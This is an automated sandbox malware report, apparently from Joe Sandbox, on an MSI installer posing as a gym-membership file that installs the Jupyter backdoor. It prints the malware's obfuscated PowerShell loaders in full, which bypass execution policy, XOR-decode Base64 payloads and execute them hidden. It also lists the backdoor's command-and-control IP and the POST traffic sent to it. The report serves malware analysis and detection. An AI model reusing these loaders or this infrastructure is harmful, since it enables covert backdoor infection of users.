
Windows Analysis Report Nyship-Empire-Plan-Gym-Membership.msi

Overview

General Information

Sample Name: Nyship-Empire-Plan-Gym-Membership.msi
Analysis ID: 496721
MD5: f6118522893f3cd95198527d6f0282ba
SHA1: dd9b59d2553043a4740b9cd557c7dde0740050cf
SHA256: 5cf24553e521de102628e1ebdadb69a6623904f08b51cf5b1ea14779e03e8682

Detection

Jupyter
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Jupyter backdoor
Yara detected Powershell dedcode and execute
Multi AV Scanner detection for submitted file
Sigma detected: Encoded FromBase64String
Sigma detected: Powershell Decrypt And Execute Base64 Data
Multi AV Scanner detection for dropped file
Sigma detected: FromBase64String Command Line
Bypasses PowerShell execution policy
Suspicious powershell command line found
Writes many files with high entropy
C2 URLs / IPs found in malware configuration
Powershell creates an autostart link
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Creates a start menu entry (Start Menu\Programs\Startup)
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6320 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Nyship-Empire-Plan-Gym-Membership.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 4660 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5732 cmdline: C:\Windows\System32\MsiExec.exe -Embedding B7C7A506E4E2E0AFFC1F9F29629DA729 C MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 6024 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9EA879A27423DE072DACED38067EC0CA MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 6656 cmdline: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1 MD5: 4767B71A318E201188A0D0A420C8B608)
      • PDFsamEnhanced7Installer.exe (PID: 616 cmdline: 'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe' MD5: 801B1B11E979AF812CA4387E5F438AD8)
        • regsvr32.exe (PID: 6964 cmdline: regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
        • PDFsam_Enhanced_7_Installer.exe (PID: 7016 cmdline: 'C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe' /RegServer MD5: 801B1B11E979AF812CA4387E5F438AD8)
      • powershell.exe (PID: 2212 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;' MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6916 cmdline: 'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Jupyter Backdoor

{"Version": "OC-1", "C2 url": "http://146.70.41.157"}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Nyship-Empire-Plan-Gym-Membership.msi | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\20211004\PowerShell_transcript.377142.wm8KM1k2.20211004212820.txt | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |
C:\Windows\Installer\MSI113A.tmp | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |
C:\Windows\Installer\5206a8.msi | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |
C:\Windows\Installer\5206aa.msi | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp | JoeSecurity_Jupyter | Yara detected Jupyter backdoor | Joe Security |
00000009.00000003.740405887.000001B512853000.00000004.00000001.sdmp | SUSP_LNK_SuspiciousCommands | Detects LNK file with suspicious content | Florian Roth |
  • 0x90be:$s4: -ep bypass
  • 0x5cd96:$s4: -ep bypass
  • 0xb0a6e:$s4: -ep bypass
  • 0x104746:$s4: -ep bypass
  • 0x15841e:$s4: -ep bypass
  • 0x8ad4:$s12: WscrIPT.sHell
  • 0x32ea0:$s12: WscrIPT.sHell
  • 0x5c7ac:$s12: WscrIPT.sHell
  • 0x86b78:$s12: WscrIPT.sHell
  • 0xb0484:$s12: WscrIPT.sHell
  • 0xda850:$s12: WscrIPT.sHell
  • 0x10415c:$s12: WscrIPT.sHell
  • 0x12e528:$s12: WscrIPT.sHell
  • 0x157e34:$s12: WscrIPT.sHell
  • 0x182200:$s12: WscrIPT.sHell
00000009.00000003.749058298.000001B512853000.00000004.00000001.sdmp | SUSP_LNK_SuspiciousCommands | Detects LNK file with suspicious content | Florian Roth |
  • 0x90be:$s4: -ep bypass
  • 0x88246:$s4: -ep bypass
  • 0xdbf1e:$s4: -ep bypass
  • 0x12fbf6:$s4: -ep bypass
  • 0x1838ce:$s4: -ep bypass
  • 0x8ad4:$s12: WscrIPT.sHell
  • 0x32ea0:$s12: WscrIPT.sHell
  • 0x5c7ac:$s12: WscrIPT.sHell
  • 0x5d270:$s12: WscrIPT.sHell
  • 0xb2028:$s12: WscrIPT.sHell
  • 0xdb934:$s12: WscrIPT.sHell
  • 0x105d00:$s12: WscrIPT.sHell
  • 0x12f60c:$s12: WscrIPT.sHell
  • 0x1599d8:$s12: WscrIPT.sHell
  • 0x1832e4:$s12: WscrIPT.sHell
  • 0x1ad6b0:$s12: WscrIPT.sHell
00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmp | JoeSecurity_Jupyter | Yara detected Jupyter backdoor | Joe Security |
00000009.00000003.739854732.000001B512853000.00000004.00000001.sdmp | SUSP_LNK_SuspiciousCommands | Detects LNK file with suspicious content | Florian Roth |
  • 0x90be:$s4: -ep bypass
  • 0x5cd96:$s4: -ep bypass
  • 0xb0a6e:$s4: -ep bypass
  • 0x104746:$s4: -ep bypass
  • 0x15841e:$s4: -ep bypass
  • 0x8ad4:$s12: WscrIPT.sHell
  • 0x32ea0:$s12: WscrIPT.sHell
  • 0x5c7ac:$s12: WscrIPT.sHell
  • 0x86b78:$s12: WscrIPT.sHell
  • 0xb0484:$s12: WscrIPT.sHell
  • 0xda850:$s12: WscrIPT.sHell
  • 0x10415c:$s12: WscrIPT.sHell
  • 0x12e528:$s12: WscrIPT.sHell
  • 0x157e34:$s12: WscrIPT.sHell
  • 0x182200:$s12: WscrIPT.sHell

Unpacked PEs

Source | Rule | Description | Author | Strings
21.2.powershell.exe.273b1806fc8.0.unpack | JoeSecurity_Jupyter | Yara detected Jupyter backdoor | Joe Security |
21.2.powershell.exe.273b1806fc8.0.raw.unpack | JoeSecurity_Jupyter | Yara detected Jupyter backdoor | Joe Security |
21.2.powershell.exe.273c9b50000.1.raw.unpack | JoeSecurity_Jupyter | Yara detected Jupyter backdoor | Joe Security |
21.2.powershell.exe.273c9b50000.1.unpack | JoeSecurity_Jupyter | Yara detected Jupyter backdoor | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Encoded FromBase64String
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212
Sigma detected: FromBase64String Command Line
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132778492979659065.2212.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell Decrypt And Execute Base64 Data
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 6656, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;', ProcessId: 2212

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 21.2.powershell.exe.273b1806fc8.0.raw.unpack | Malware Configuration Extractor: Jupyter Backdoor {"Version": "OC-1", "C2 url": "http://146.70.41.157"}
Multi AV Scanner detection for submitted file
Source: Nyship-Empire-Plan-Gym-Membership.msi | Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe | ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe | ReversingLabs: Detection: 20%
Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Windows\System32\msiexec.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}
Source: unknown | HTTPS traffic detected: 64.15.159.234:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: Binary string: ?crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMcrypto\ex_data.c source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb> source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp
Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\PDFsam_Enhanced_7_Installer.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\conhost.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://146.70.41.157
Source: Joe Sandbox View | ASN Name: TENET-1ZA TENET-1ZA
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 313Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 509
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 415
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 675
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 612
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 640
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 600
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 474
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 464
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 705
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 721
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 322
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 665
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 277
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 653
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 443
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 674
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 609
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 644
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 713
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 303
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 627
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 674
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 416
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
                        Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
                        Source: unknown | TCP traffic detected without corresponding DNS query: 146.70.41.157